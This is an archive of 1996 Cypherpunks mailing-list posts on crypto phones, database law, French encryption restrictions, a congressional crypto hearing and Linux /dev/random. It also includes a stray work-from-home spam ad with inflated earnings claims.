people realize.  (Where would this world be without Mark Twain (a nym for
Samuel Clemmens), Maxwell Grant (the nym for Walter B. Gibson and others
for the Shadow pulps), and the thousands of other nyms that appear in the
publishing field?)  Just because they are published under a nym does not
mean anyone takes their books less seriously or enjoy them less.  (In fact,
there are many authors that are nyms unbeknownst to the readers.  I would
say that most nyms in the publishing world are...)

---
|              "Remember: You can't have BSDM without BSD."              |
|"The moral PGP Diffie taught Zimmermann unites all| Disclaimer:         |
| mankind free in one-key-steganography-privacy!"  | Ignore the man      |
|`finger -l alano@teleport.com` for PGP 2.6.2 key  | behind the keyboard.|
|         http://www.ctrl-alt-del.com/~alan/       |alan@ctrl-alt-del.com|




From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: Lucky Green <shamrock@netcom.com>
Date: Fri, 22 Nov 1996 10:41:08 -0800 (PST)
To: Peter Trei <trei@process.com>
Subject: RE: Mass-market crypto phones
In-Reply-To: <199611221438.GAA12285@toad.com>
Message-ID: <Pine.3.89.9611221012.A1281-0100000@netcom6>
MIME-Version: 1.0
Content-Type: text/plain


On Fri, 22 Nov 1996, Peter Trei wrote:
> It's kind of pathetic - I'm sure that the billions lost to cellular fraud 
> far outweigh the value of crimes that the  LEA groups have been 
> able  prevent by preserving their ability to illegally eavesdrop on 
> cell calls without a warrant.

The LEA's are not intested in saving the public money. They are 
interested in preserving and expanding their power. If it costs 
$1,000,000 per wiretap, who cares? The government has men with guns that 
can always go out and extort more cash from the population.

--Lucky




From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: "Richard L. Field" <field@pipeline.com>
Date: Fri, 22 Nov 1996 03:03:44 -0800 (PST)
To: Greg Broiles <gbroiles@netbox.com>
Subject: Re: Database law... silver lining??
Message-ID: <1.5.4.16.19961122060504.331fc06c@pop.pipeline.com>
MIME-Version: 1.0
Content-Type: text/plain


   I am not suggesting patent-like protection.  Rather, I'd argue that there
is very little "independent creation" with respect to my personal database.
Provided it is considered my database to begin with, information that I give
on a warranty card, when I ask for credit, etc. remains mine under the
proposed U.S. law.  Just because a third party tries to assemble it from
those sources doesn't mean it suddenly becomes free data, from a
non-database source.  By that line of reasoning, any protected database
would lose all protection upon its publication by a licensee, so long as you
copied it from the licensee and not the originator.  This is not how I read
the proposed law, and it is not how big database publishers would want it read.

   - Richard Field

(Nothing in this line of argument is meant to imply that I am in favor of
the proposal.)



At 11:47 PM 11/21/96 -0800, Greg Broiles wrote:

[my proposal snipped]
>
>Cute, but any such proposal is almost guaranteed to allow for independent
>creation from a non-database source - e.g., warranty cards, info extracted
>from you when you ask for credit, public records, etc. For example, one
>comment to Article 3 of the proposed WIPO treaty on sui generis protection
>of databases provides:
>
>"3.02 The protection provided does not preclude any person from
>independently collecting, assembling or compiling works, data or materials
>from any source other than a protected database."
>
>(see <http://www.loc.gov/copyright/wipo6.html> for more.)
>
>It's very unlikely that Congress (or the PTO) intends to do anything
>that'll screw up what's already working well for big database publishers.
>Your theory is similar to a patent flavor for databases, while the
>proposals floated out so far are much more like copyright - e.g.,
>independent creation is OK, but copying is not, even with wide public
>distribution, and long protection times. With patent, independent creation
>is not OK, copying (the information, not the device) is encouraged/allowed,
>and protection time is short.





From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: Thomas Hennes <aie-rd@pobox.oleane.com>
Date: Fri, 22 Nov 1996 02:05:34 -0800 (PST)
To: cypherpunks@toad.com
Subject: Re: [TARGET ACQUIRED] Cryptography in France
In-Reply-To: <v03007801aeba4f92d42b@[207.167.93.63]>
Message-ID: <32957B57.6952@pobox.oleane.com>
MIME-Version: 1.0
Content-Type: text/plain


Timothy C. May wrote:
> 
> I gave a talk a couple of years ago in France (well, Monte Carlo, actually,
> but the conference was heavily francocentric), and it was clear to me that
> France is in the Dark Ages on these issues.

Not all issues.. France is not in the Dark ages in matters of computer
smarts or network connectivity, but...

> Sure, they've got "Minitel," an ostensibly ubiquitous network. But Minitel
> is actually a primitive, sub-Prodigy-class system, controlled by the
> government of France and associated special interests (France Telecom,
> etc.).

...but yeah, we suffered from the Minitel at the same time that BBSes
were flourishing in the US. Calling the Minitel a sub-Prodigy-class
system is, believe me, an insult to Prodigy. The Minitel transmitted at
75 bps in one direction and 300 bps in the other, and -you had guessed
it- it was only a matter of state-monopoly France Telecom wanting to
make more money whereas they had the technical knowledge to implement a
much better system. The Minitel did nothing but delay the arrival of the
Internet and other PC-based networks, setting networking in France
several years back in terms of technicality and economic opportunity.

> The number of French persons actively on the Internet is fairly low--ask
> yourself how many ".fr" domain names you've seen lately, and when you last
> saw one on Cypherpunks? I see many more Finnish and even New Zealand domain
> names.

Don't let this fool you.. A LOT of net users in France do not have the
dreaded
".fr" domain. There is quite a number of ".com" and ".net" French users
on the Internet. And I am a living example of the fact (this is my real
address up there, not a US-based remailer).

> Further, encryption is heavily restricted in France. As one French friend
> put it, "You can apply for a license to use crypto--the same way you would
> apply for a license to buy your own Exocet missile."

This is sad, because this is true. Which was all the reason why I wrote
the original message in that thread.

> So, France is somewhere near the bottom of my list of fertile grounds for
> crypto anarchy.

Why? It is probably easier to implement crypto anarchy in other, more
fertile grounds, but the question is, is it more _useful_ ?

Thomas Hennes
aie-rd@pobox.oleane.com




From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: abostick@netcom.com (Alan Bostick)
Date: Sun, 24 Nov 1996 11:12:03 -0800 (PST)
To: ichudov@algebra.com
Subject: Re: Alias list for killfiling Gr%b%r
In-Reply-To: <199611220304.VAA02832@manifold.algebra.com>
Message-ID: <o2fly8m9L8Ec085yn@netcom.com>
MIME-Version: 1.0
Content-Type: text/plain


-----BEGIN PGP SIGNED MESSAGE-----

In article <199611220304.VAA02832@manifold.algebra.com>,
ichudov@algebra.com (Igor Chudov @ home) wrote:

> Dr. John Martin Grubor is the most harmless and most entertaining 
> among all kooks.
> 
> His posting volume is a bit high, but other than that DrG never
> got anyone in trouble.

I dunno about "harmless".  Publishing lists of "known homosexuals"
can have repercussions that outweigh their entertainment value.

- -- 
Alan Bostick               | You know those chemicals women have in them,
                           | when they've got PMS? Well, men have those very
mailto:abostick@netcom.com | same chemicals in them *all the time*.
news:alt.grelb             |           Margaret Atwood, THE ROBBER BRIDE
http://www.alumni.caltech.edu/~abostick

-----BEGIN PGP SIGNATURE-----
Version: 2.6.2

iQB1AwUBMpX+N+VevBgtmhnpAQFgpAL/YqC7+EpmfT83Zylt4YT5iROTSTqLnKWs
4L8X+WfM7yav2quuvS1UDusAJQsqeRKjkarAzz37ntU4QfslXGx8sFi+gZylhgdc
f0jGRNqlFPvTDUb/JQ86XNleukJTUx7n
=qBCN
-----END PGP SIGNATURE-----




From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: John Gilmore <gnu@toad.com>
Date: Fri, 22 Nov 1996 11:36:17 -0800 (PST)
To: cypherpunks
Subject: Nov 26 DC: House hearing on compsec & crypto: PRZ, Denning, Lin, ...
Message-ID: <199611221936.LAA15679@toad.com>
MIME-Version: 1.0
Content-Type: text/plain


DC-area cypherpunks may want to attend to watch the sausage machine in action.

Forwarded-by: Dave Farber <farber@cis.upenn.edu>
Subject: IP: House Briefing on Crypto
From: Dorothy Denning

The Technology Subcommittee of the House Science Committee is holding a
briefing on computer security and encryption at 2:00 PM in Room 2318
Rayburn on Tuesday, November 26.  Panelists are:

  Herb Lin, moderator.  Study director of NRC crypto report.
  Bill Reinsch, Commerce Dept. Undersecretary for Export Administration
  Dan Geer, Director of Engineering, Open Market, Inc.
  John Linn, chair of IETF Common Authentication Technology Working Group
  Dorothy Denning, professor at Georgetown University
  Phil Zimmerman, author of PGP




From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: "Mullen Patrick" <Mullen.Patrick@mail.ndhm.gtegsc.com>
Date: Fri, 22 Nov 1996 08:34:59 -0800 (PST)
To: "Cypherpunks" <cypherpunks@toad.com>
Subject: RE: Mass-market crypto phones
Message-ID: <n1363459702.71040@mail.ndhm.gtegsc.com>
MIME-Version: 1.0
Content-Type: text/plain


_______________________________________________________________________________
From: Adam Shostack on Fri, Nov 22, 1996 1:21

>

>	I'd just like to second what Lucky wrote at the end of his
>very nice summation of the crypto phone hardware issues.  Eric's phones
>have damn good voice quality in secure mode.

I should probably make it more clear that my comment referred to price, NOT
quality.  I'm sure it is a wonderful product (I haven't tried it myself),
but I believe the price tag was at or around $1000.  My comments on the 
hardware used was for demostration purposes, not for saying anything was
wrong with the design strategy.  In fact, I thought it was a perfectly fine
strategy, and easy(ish) to implement.  Basically, it took the dedicated
computer you would need for phone encryption and put it in a cheaper box.

To be honest, I thought he had a good idea.  I just wouldn't want to pay
$1000 for phone encryption.  But, it's rare I have conversations where I
need that much security.  I'm sure the product is worth it; it's just out
of my price range.  And probably out of the price range of the average user.

PM

USER ERROR: REPLACE AND STRIKE ANY KEY WHEN READY





From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: Lucky Green <shamrock@netcom.com>
Date: Fri, 22 Nov 1996 11:47:27 -0800 (PST)
To: Mullen Patrick <Mullen.Patrick@mail.ndhm.gtegsc.com>
Subject: RE: Mass-market crypto phones
In-Reply-To: <n1363459702.71040@mail.ndhm.gtegsc.com>
Message-ID: <Pine.3.89.9611221147.A7402-0100000@netcom6>
MIME-Version: 1.0
Content-Type: text/plain


On 22 Nov 1996, Mullen Patrick wrote:
> To be honest, I thought he had a good idea.  I just wouldn't want to pay
> $1000 for phone encryption.  But, it's rare I have conversations where I
> need that much security.  I'm sure the product is worth it; it's just out
> of my price range.  And probably out of the price range of the average user.

It was a good idea. It just is facing some very hard engineering 
challenges. Using software based voice encryption products 
may work for you. By all means, do give them a try. PGPfone has a codec 
for use with an ISDN or better. If you have such a fast line, the voice 
quality is fine. Note that a fast IP connection may or may not suffice. 

Here is why:

Other than bandwidth, the other essential property of the link is constant 
and preferably low delay. I did not mention this in my original 
tutorial, since this
1. We were assuming use over a regular POTS, which already has fairly 
constant delay.
2. There is nothing any codec can do to make up for variable delays.

The reason is simple. If the delay is not constant, such as if you are 
sending UDP packets over the Internet new problems arise. One packet 
may take 50ms and the next packet may take 250ms, if it doesn't just get lost along the 
way. Packets may also arrive out of sequence. One might think the answer 
to this is simply a large buffer at the receiving end. Make the buffer 
large enough, to be reasonably sure that the packets will all be there, say 
500ms. Assuming no other delays, that would mean that you have a 1/2 
second delay between the person saying a word and you hearing it. 
Multiply this by two, since the other side would have the same buffer, 
and you have 1 second delays. Too long for a conversation. And then there 
is echo cancellation. But I'll spare you this. ;-)

--Lucky




From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: pjb@ny.ubs.com
Date: Fri, 22 Nov 1996 08:46:43 -0800 (PST)
To: camcc@abraxis.com
Subject: Re: Word Lists
Message-ID: <199611221646.LAA05431@sherry.ny.ubs.com>
MIME-Version: 1.0
Content-Type: text/plain


this used to be a good site for what you want. YMMV

"An anonymous ftp server has been built on wocket.vantage.gte.com which 
contains the following files in the pub/standard_dictionary directory:"

	-paul

> From cypherpunks-errors@toad.com Fri Nov 22 03:04:16 1996
> X-Sender: camcc@smtp1.abraxis.com
> X-Mailer: Windows Eudora Pro Version 3.0 (32)
> Date: Thu, 21 Nov 1996 17:29:07 -0500
> To: kb4vwa@juno.com (Edward R. Figueroa)
> From: camcc@abraxis.com (Alec)
> Subject: Re: Word Lists
> Cc: cypherpunks@toad.com
> Mime-Version: 1.0
> Content-Type> : > text/plain> ; > charset="us-ascii"> 
> Sender: owner-cypherpunks@toad.com
> Content-Length: 1012
> 
> At 01:40 PM 11/21/96, you wrote:
> :I'm looking for a Large Word List, for a pkcrack program.
> :
> :Anyone have any idea where to find one, or how to convert a dictionary
> :formated file to a wordlist file?
> :
> :Ed
> :
> http://world.std.com/~reinhold/diceware.wordlist.asc
> 
> This is the wordlist for Diceware, and I quote, "7776 short English words,
> abbreviations and easy to remember character strings. The average length of
> each word is about 4.2 characters. The biggest words are six characters long.
> 
> The list is based a longer word list posted to the Internet news group
> sci.crypt by Peter Kwangjun Suk."
> 
> This may not be long enough for your needs.
> 
> The address of the Diceware page is 
> 
> http://world.std.com/~reinhold/diceware.page.html
> 
> Good luck.
> 
> Cordially,
> 
> Alec                   
> 
> PGP Fingerprint:
> Type bits/keyID    Date       User ID
> pub  1024/41207EE5 1996/04/08 Alec McCrackin <camcc@abraxis.com>
>           Key fingerprint =  09 13 E1 CB B3 0C 88 D9  D7 D4 10 F0 06 7D DF 31 
>                              
> 
> 




From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: Sean Roach <roach_s@alph.swosu.edu>
Date: Fri, 22 Nov 1996 11:50:33 -0800 (PST)
To: Lucky Green <cypherpunks@toad.com
Subject: Re: Stewart Baker on new crypto rules
Message-ID: <199611221950.LAA15884@toad.com>
MIME-Version: 1.0
Content-Type: text/plain


At 08:17 PM 11/20/96 -0800, Lucky Green wrote:
> he [hp's policy person]
>replied: 
>
>"There are many 
>possible interpretations of the words 'voluntary' and 'mandatory'."
>
>I am willing to testify to this under oath.
>
>I don't know what dictionary HP is using. Orwell himself must have 
>written it.

Well, if the customer does not complain about its inclusion, and chooses to
use it for its simplicity over more secure, "after market" systems, then
thats voluntary.  Thats the same voluntary that means that if the people
don't get out to the polls then they volunteered to keep thier opinions
about how government should be run to themselves.  It will probably be
voluntary, no one tells you that you have to use interNic when using the
internet, but you probably do because it is easier than trying to route
around it to its new competitor (the one issuing URL's ending in .auto and
.bus among others).  No one is telling you to use interNic, no one is
telling you to pay to register with interNic, but it is definately less of a
headache.





From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: Sean Roach <roach_s@alph.swosu.edu>
Date: Fri, 22 Nov 1996 11:50:53 -0800 (PST)
To: Robert Hettinga <cypherpunks@toad.com
Subject: Re: Why I Don't Read SF Much Anymore
Message-ID: <199611221950.LAA15893@toad.com>
MIME-Version: 1.0
Content-Type: text/plain


At 11:00 PM 11/20/96 -0500, Robert Hettinga wrote:
>At 9:09 pm -0500 11/20/96, Hal Finney wrote:
>>What fiction can people recommend which presents crypto/privacy issues
>>realistically?  How about this new book that Neal Stephenson is working
>>on, does anyone know what it's about?  His short story, "Hack the Spew",
>>a few months ago (in Wired, I think?) had a strong crypto flavor.
>
>His, "Great Samolean Caper" for Time/Pathfinder was pure cryptoanarchy...
>
>I don't know if it's still around though.
>
I saved the whole magazine, I can copy it for you if you like.  I thought
that I had the magazine in the dorm room but I can't seem to find it.





From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: Sean Roach <roach_s@alph.swosu.edu>
Date: Fri, 22 Nov 1996 11:50:56 -0800 (PST)
To: cypherpunks@toad.com
Subject: Re: Does John Gilmore EAT Asshole?
Message-ID: <199611221950.LAA15899@toad.com>
MIME-Version: 1.0
Content-Type: text/plain


This aga nut is getting to be a real pain in the... Well lets say that he is
one hellish proctologist.  I am very tempted to send this nut a few copies
of the netscape 1.0 executable.  Worthless and fairly bulky.  AND I would be
a citizen taking action.  When Mr. Gilmore took action, he was lambasted for
his troubles.  Mr. Gilmore, however, had the misfortune of holding a
position of percieved power, I don't.  I assume that aga will not see this
as he doesn't follow the list.





From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: Sean Roach <roach_s@alph.swosu.edu>
Date: Fri, 22 Nov 1996 11:51:01 -0800 (PST)
To: Clay Olbon II <cypherpunks@toad.com
Subject: Re: Mass-market crypto phones
Message-ID: <199611221950.LAA15906@toad.com>
MIME-Version: 1.0
Content-Type: text/plain


At 09:10 AM 11/21/96 -0500, Clay Olbon II wrote:
>A while back, Eric Blossom posted a URL for a mass-market, phone encyrption
>device (http://www.comsec.com/).  The point of this post is to posit a
>scenario based on the implications of this product.  This is speculation
>based on where I think such products should be heading.
>
>I think we need to keep a couple of goals in mind.  The first, is to get
>encrypting phones (or phone add-ons) into Wal-mart, K-mart, etc (where
>probably most Americans now buy their phones).  The prices need to be low
>enough that people will want to buy them (<$100?).  Is this technically
>feasible?  The comsec device from the above URL already demonstrates the
>needed capability.  Is the cost target possible?  My guess is soon, given
>the lowering costs and increasing capabilities of current processors.
>
>The second goal needs to be to push a similar product for cell-phones.  I
>think this will be perhaps an easier sell, given the higher initial cost for
>these phones, and their reduced security.  Perhaps a home device could be
>sold with the cell-phone as a package deal, so that communications with the
>"home base" (i.e your office, home, etc) would be secure.  With the rapid
>growth in cell-phone sales, selling a package such as this might ensure a
>larger user-base of home devices.
>
>Given that these goals are met, I think widespread use of crypto over phone
>lines would become almost inevitable.  However, the fun part would be the
>introduction of such products.  The FUD coming from police, the government,
>etc. would be amazing to behold.
>
At first this seemed to be a challenging goal as public key encryption (at
least the type of which I am aware) requires a public key ring, but then I
thought, what would be the point in real time communitation?
Here is my idea.
The initiating phone sends a public key to the receiving phone.
The receiving phone takes this public key and uses it to prepare the session
key, or perhaps both session keys (one key for each simples circuit), as in PGP.
Both boxes would need to have hybrid circuits in them like the telephone
company uses to filter out the incoming signal from the outgoing signal.
The telephone amplifiers only amplify half of the signal, so it basically
consists of two simplex circuits from the local trunk to the other trunks.
This could be bypassed if the device set between the base and the handset.
Best would be to have the hybrid circuit so that it could work with the more
basic models.
I can only see two problems.
The first problem I can see right now would be randomization, (line noise
sampling?, hold the microphone close to a radio playing static until the LED
starts flashing?)
The second challenge would be getting public key encryption to work with an
analog system.  The device will have to have two analog to digital
converters and two digital to analog converters.  I believe that the
telephone operates with a carrier of about 3000 Hz, thus the box will
probably need to maintain a sampling rate of 1500 Hz or less, if this
frequency will carry voice.  The system will probably need some form of
run-time compression built in as well as sample voice at a low bit depth.
The result, under ideal circumstances will probably be a tinny sound and
loss of fidelity.
The D-A, A-D pair on the telco side could be replaced by a good modem, this
would eliminate some of the problems of the RBOC filters cutting out the
"noise" which would really be signal.
If you set the sampleing rate at 3000 cycles per second, by 8 bits of depth,
you would need to be able to transmit clearly 3000 * 8 bits per second or
24000 bits per second.  That would be 24 KiloBITS per second, about 1/8th
the 28.8 KiloBYTE modems that are commond today.  A 3000 baud modem should
be both cheap and easy to pack into a small package.  This would probably
allow for no compression at 8 bits of sampling depth.
So, the block diagram would be as follows.
                ________________     _______________     ___________
|
                |              | --> |             | --> |         |  Line
to       |
 Line from RBOC | 3000+ Baud   |-----| Public Key  |-----|A-D /D-A |
Telephone     |
----------------| Full Duplex  |     | Encryption  |     |  Pair
|--------------  |
   <--->        | Modem        |-----| Layer       |-----|         |
<--->       |
                |______________| <-- |_____________| <-- |_________|
|



I was thinking that the device could be built into a case about the same
size as a modem or answering machine, possibly a little taller to accomidate
the modem circuit, should a full duplex modem replace the telco end A-D, D-A
pair.
Unfortunately, I have very little experience with circuits.  I can't even
draw out an asyncronis multivibrator right now.  (That is a square wave
generator involving 2 transistors, 4 resistors, and 2 capicitors, not a toy
based around a motor with an off center weight)

P.S. The line on the far right is for alignment, If this line is crooked,
copy and paste the diagram to a standard ASCII editor.  this should
eliminate the pipes and spaces from being shorter than every thing else.





From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: Kamil Golombek <Zero@mrkev.vabo.cz>
Date: Fri, 22 Nov 1996 03:49:38 -0800 (PST)
To: cypherpunks@toad.com
Subject: for people from .CZ domain
Message-ID: <329586CB.249B@mrkev.vabo.cz>
MIME-Version: 1.0
Content-Type: text/plain


Hi to all!

	i'd like to meet or know people, who read this list and are from Czech
republic. Some kind of cooperation is possible. Conversation even in
Czech (but i prefer English) . Could you send me an e-mail? Maybe we
live several km far from each other and we aren't able to comunicate. 
	i also apologize to all, who are from different state and must read
this letter. Sorry!
		
		Thanks
			ZERO




From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: Sean Roach <roach_s@alph.swosu.edu>
Date: Fri, 22 Nov 1996 12:05:44 -0800 (PST)
To: cypherpunks@toad.com
Subject: [noise] Re: Why I Don't Read SF Much Anymore
Message-ID: <199611222005.MAA16122@toad.com>
MIME-Version: 1.0
Content-Type: text/plain


At 12:14 AM 11/21/96 -0800, Timothy C. May wrote:
...
>- John Brunner, "The Shockwave Rider," and, my favorite, "Stand on
>Zanzibar." Required reading. As Shalmaneser would put it, "Christ, what an
>imagination he had."
...
Anyone else notice similarites between the protagonist in "The Shockwave
Rider" and "The Pretender" the new Television series.  They both even have
sympathetic pursuers.  Any wagers on how long it will take the pretender to
turn his old handler?
BTW, Tim, I don't mean to offend you by adding noise to the front, but this
post is a little off topic, mine not yours.  I seem to have offended someone
else by doing something similar.





From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: frantz@netcom.com (Bill Frantz)
Date: Fri, 22 Nov 1996 12:09:22 -0800 (PST)
To: cypherpunks@toad.com
Subject: Re: The public sees no need for crypto at this time
Message-ID: <199611222009.MAA17707@netcom6.netcom.com>
MIME-Version: 1.0
Content-Type: text/plain


At 10:25 AM 11/21/96 -0800, Timothy C. May wrote:
>I believe that at this time the differential market value to customers of
>having strong crypto in telephones is near-zero, and in cell-phones is only
>slightly greater. [reasoning deleted].

I generally agree with Tim about consumers.  However, I remember working on
a theater production where we were using Radio Shack 2-way headphones for
communication.  One day while we were setting up, we were able to overhear
a woman discussing (presumably with a girlfriend) her boyfriend and their
sex life over a portable telephone.  You can bet that every available
headset was in use and all other work stopped.

Where I think there is a market and an awareness of a need is in the
corporate world.  I recently saw a corporate security policy which
specifically restricted discussing classified information on portable or
cell phones.  If I were in France (to pick on just one guilty country), I
would not want to discuss secrets involving competitive position vs. a
French company on a landline connection.  The big driving force for
companies is how much the facility costs.  (I recently heard a price of
$700 for non-crypto phones.)  If the cost is low enough, company employees
will have these boxes in their homes.

The other big obstacle is standards.  As far as I can tell, every crypto
phone has its own protocol.  If there were a standard set of protocols, it
would greatly help the market, as it has for so many other products.  As a
first step, I suggest that Eric Blossom and PGP Inc. work together to
develop a mode where their products can communicate with each other.


-------------------------------------------------------------------------
Bill Frantz       | The lottery is a tax on    | Periwinkle -- Consulting
(408)356-8506     | those who can't do math.   | 16345 Englewood Ave.
frantz@netcom.com |       - Who 1st said this? | Los Gatos, CA 95032, USA






From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: jc105558@spruce.hsu.edu
Date: Tue, 26 Nov 1996 17:01:25 -0800 (PST)
To: cypherpunks@toad.com
Subject: RE: Re: wealth and property rights
Message-ID: <009ABBF7.ACB06A80.64@SPRUCE.HSU.EDU>
MIME-Version: 1.0
Content-Type: text/plain


From:	MX%"dave@kachina.jetcafe.org" 22-NOV-1996 00:41:58.20
To:	MX%"aba@dcs.ex.ac.uk"
CC:	MX%"freedom-knights@kachina.jetcafe.org",MX%"cypherpunks@toad.com"
Subj:	Re: wealth and property rights

Return-Path: <cypherpunks-errors@toad.com>
Received: from toad.com by spruce.HSU.EDU (MX V4.1 VAX) with SMTP; Fri, 22 Nov
          1996 00:41:55 EST
Received: (from majordom@localhost) by toad.com (8.7.5/8.7.3) id SAA04549 for
          cypherpunks-outgoing; Thu, 21 Nov 1996 18:36:12 -0800 (PST)
Received: from kachina.jetcafe.org (jetcafe.org [207.155.21.2]) by toad.com
          (8.7.5/8.7.3) with ESMTP id SAA04544 for <cypherpunks@toad.com>; Thu,
          21 Nov 1996 18:36:08 -0800 (PST)
Received: from [127.0.0.1] ([127.0.0.1]) by kachina.jetcafe.org (8.7.5/8.7.3)
          with SMTP id SAA02028; Thu, 21 Nov 1996 18:35:51 -0800 (PST)
Message-ID: <199611220235.SAA02028@kachina.jetcafe.org>
X-Authentication-Warning: kachina.jetcafe.org: Host [127.0.0.1] didn't use HELO
    protocol
To: Adam Back <aba@dcs.ex.ac.uk>
CC: freedom-knights@kachina.jetcafe.org, cypherpunks@toad.com
Subject: Re: wealth and property rights
Date: Thu, 21 Nov 1996 18:35:49 -0800
From: Dave Hayes <dave@kachina.jetcafe.org>
Sender: owner-cypherpunks@toad.com
Precedence: bulk

> Btw, people of your mentality (communists/socialists) already make it
> very difficult for me to accumulate, due to the exhorbitant tax rates
> to support those who chose to blow their money as soon as they have
> it

I don't necessarily want to support "socialism" nor "capitalism". Both
are extremes of a situation which does no one any good to exist. 

However, I would question the implication that "socialists" are
responsible for the higher tax rates you currently experience.  

For example, I could make a strong case that you really have some
clever "capitalists" who have learned how to express their
"capitalism" quite effectively across the space of all people in a
"country".

8-)
------
Dave Hayes - Altadena CA, USA - dave@jetcafe.org 
Freedom Knight of Usenet - http://www.jetcafe.org/~dave/usenet

         It is the wise bird who builds his nest in a tree.






From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: Buster de body crab <kadafi@shell.cwnet.com>
Date: Fri, 22 Nov 1996 18:59:28 -0800 (PST)
To: Mullen Patrick <Mullen.Patrick@mail.ndhm.gtegsc.com>
Subject: RE: Mass-market crypto phones
In-Reply-To: <n1363438071.71871@mail.ndhm.gtegsc.com>
Message-ID: <Pine.BSD/.3.91.961122121706.20445A-100000@shell.cwnet.com>
MIME-Version: 1.0
Content-Type: text/plain




On 22 Nov 1996, Mullen Patrick wrote:

> _______________________________________________________________________________
> From: Lucky Green on Fri, Nov 22, 1996 14:52
> <snip>
> 
> >quality is fine. Note that a fast IP connection may or may not suffice. 
>                                    ^^^^^^^^^^^^^
> <snip>
>  
> >sending UDP packets over the Internet new problems arise. One packet 
>          ^^^^^^^^^^^          ^^^^^^^^
> <snip>
> 
> >--Lucky
> 
> I was going to just listen to the way this thread is going because I find
> it fascinating, but now that it has been spelled out, I must make a very
> important distinction between my idea and PGPFone, WebPhone, etc. --
> These are Web-based programs designed to speak over very long distances
> for "free" (neglecting ISP charges, etc.), adding the extra functionality
> of encrypting your data along the way so sniffers, etc can't listen in 
> on your conversation.
> 
> My encryptophone(tm) :-) is purely a modem-modem protocol.  This way, even at
> 14.4k you get all of your throughput.  No TCP/IP overhead.  No busy Net.
> No "Why won't my ISP hold a connection longer than TWO MINUTES!?!?".  The
> idea I was tossing around was a simple modem program which takes digitized
> voice, encrypts it, pumps it through the phone line directly to the modem
> on the other side which undoes it all.  (Yes, I know this is a simplified
> view.)  I also know it may not be as useful as the web-based products, but
> I also know you don't have to worry about the aforementioned problems and
> neither party has to have a Net account.  This eliminates some of the
> problems which have been sent to me.  Of course, some of the problems
> still apply and must be addressed.  I guess now's the time to admit that
> the first and foremost problem is that I have never programmed my soundcard...
> 
> I appreciate the tips and pointers everyone has been giving me tremendously.
> Hopefully, this thread doesn't do a complete reversal, because I am storing
> all hints/suggestions/tips to be used when I can finally get this project
> going.  (I'm stubborn.  I need to at least try it, if for no other reason
> than to get the knowledge... :-)
> 
> Thanks!
> PM

There is a program out there called "nautilis" or something like that and 
it works just like the webphones but you need no web.





From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: Success <success@Plink.net>
Date: Fri, 22 Nov 1996 12:33:35 -0800 (PST)
To: (Recipient list suppressed)
Subject: WORK ONLINE...PART TIME
Message-ID: <199611221802.NAA27638@psi.com>
MIME-Version: 1.0
Content-Type: text/plain


WORK ONLINE...PART TIME!

National Software Company is currently seeking independent
agents for marketing their services.  

If you're reading this, you have what it takes, (a computer and 
modem), to start your own business, work part-time or full-time.  

The commissions are great, the products are great, and it sells 
itself. You will be sent all the materials it takes to take orders 
in the convenience of your own home,-manual, order forms, software, 
etc.  

This is a real company, desiring real people worldwide who want in 
on the ground floor.  With all the people getting online via AOL, 
Compuserve, Netscape, the marketing and need is great. 

You must be a self-starter, ready to handle in-bound calls, and 
make between $700-to-$1000 per week to start. Our average agents 
yearly salary is six figures.  

Be your own boss!  Join us and become an independent sales agent.  
For more information and signing up contact: 

DOWNLOAD YOUR FREE INFORMATION DISK FROM THIS WEB SITE. 
http://www.geocities.com/WallStreet/3151/

You simply point and click - just like you do in windows. It is 
a breeze to work with. See for yourself what all the excitement 
is about... download it!

Please note: This is a one time mailing only and you have NOT
been added to any lists for future mailings.






From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: "Mark M." <markm@voicenet.com>
Date: Fri, 22 Nov 1996 10:29:18 -0800 (PST)
To: 3bmice@nym.alias.net>
Subject: Re: /dev/random and similar
In-Reply-To: <199611220835.DAA28760@anon.lcs.mit.edu>
Message-ID: <Pine.LNX.3.95.961122132835.505A-100000@gak.voicenet.com>
MIME-Version: 1.0
Content-Type: text/plain


-----BEGIN PGP SIGNED MESSAGE-----

On Fri, 22 Nov 1996, Three Blind Mice wrote:

> There was a thread here a while back about /dev/random and similar devices
> for Linux, but I managed to lose the mails and the hks.net archives still
> aren't working (any news on that?).  If someone could tell me where I
> could find such a driver, I would appreciate it very much.      TIA!

It's part of the kernel (as of 2.0).  All you have to do is create the devices
/dev/random and /dev/urandom with major number 1 and minor numbers 8 and 9
respectively.

Mark
- -- 
finger -l for PGP key
PGP encrypted mail prefered.
0xf9b22ba5 now revoked

-----BEGIN PGP SIGNATURE-----
Version: 2.6.3
Charset: noconv

iQEVAwUBMpXxbCzIPc7jvyFpAQH5wAgAtLTKQE+oJ5PBL9WMwb6PwAxJLjqf29/B
B7mwg3t884IcxfRJBeXVmUvcK3H9EdvUqgSL/ynK7Njo8xdXbkl0N4SOiYOOl8xT
0fFUvWKUuSV2k2H03X7JnOxw48Ni2rHSrZ8ojI08M3Dt0cuMKg0Dq25pMVfsbmoN
zBxmV1sOFgZKZh5daAI8Kk/Kw4rZS3HJWh1fnnCuOM+87SN7g91ZNxctV+ze1i9t
vLUZuqputFiESNitNIUi/K8qL61b07e3J7XTuGdKEt8fVyNYBVyuCsvnSOlgA29F
lXIaHX9WdIRC4jR9nmN6d49UvraQms1/O5DbV0K0oZ8qgZmc7QtsYw==
=d/l2
-----END PGP SIGNATURE-----





